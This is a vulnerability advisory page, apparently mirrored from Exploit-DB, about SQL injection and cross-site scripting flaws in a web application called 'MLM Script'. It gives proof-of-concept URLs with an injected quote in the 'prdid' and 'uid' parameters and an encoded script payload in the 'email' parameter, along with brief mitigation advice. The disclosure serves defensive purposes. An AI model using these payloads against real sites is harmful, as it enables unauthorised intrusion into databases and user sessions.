header-logo
Suggest Exploit
vendor:
MLM Script
by:
3spi0n
9,3
CVSS
HIGH
SQL Injection & XSS
89, 79
CWE
Product Name: MLM Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2019

MLM (Multi Level Marketing) Script, Multiple Vulnerabilities

The MLM Script is vulnerable to SQL Injection and XSS attacks. An attacker can inject malicious SQL queries into the vulnerable parameters of the application, such as the 'prdid' and 'uid' parameters of the productview.php page, and the 'email' parameter of the regcheck_email.php page. An attacker can also inject malicious JavaScript code into the 'email' parameter of the regcheck_email.php page.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks. The application should also validate user input to prevent XSS attacks.
Source

Exploit-DB raw data:

##################################################################################
  _____                 _       _   _                _____           
 |  __ \               | |     | | (_)              / ____|          
 | |__) |_____   _____ | |_   _| |_ _  ___  _ __   | (___   ___  ___ 
 |  _  // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   \___ \ / _ \/ __|
 | | \ \  __/\ V / (_) | | |_| | |_| | (_) | | | |  ____) |  __/ (__ 
 |_|  \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
                                                                                                                                        
##################################################################################																
MLM (Multi Level Marketing) Script, Multiple Vulnerabilities
Product Page: http://www.mlmscript.in/

Author(Pentester): 3spi0n
On Web: RevolutionSec.Com - GraySecure.Org
On Social: Twitter.Com/eyyamgudeer
##################################################################################

[1] SQL Injection Vulnerabilities on Demo Site

[+] (productview.php, prdid Param)
>>> http://server/product/version2/productview.php?prdid='1

[+] (productview.php, uid param)
>>> http://server/product/version2/profileview.php?uid='1

[2] Xss (Cross Site Scripting) Vulnerability on Demo Site

[+] (regcheck_email.php, email param)
>>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E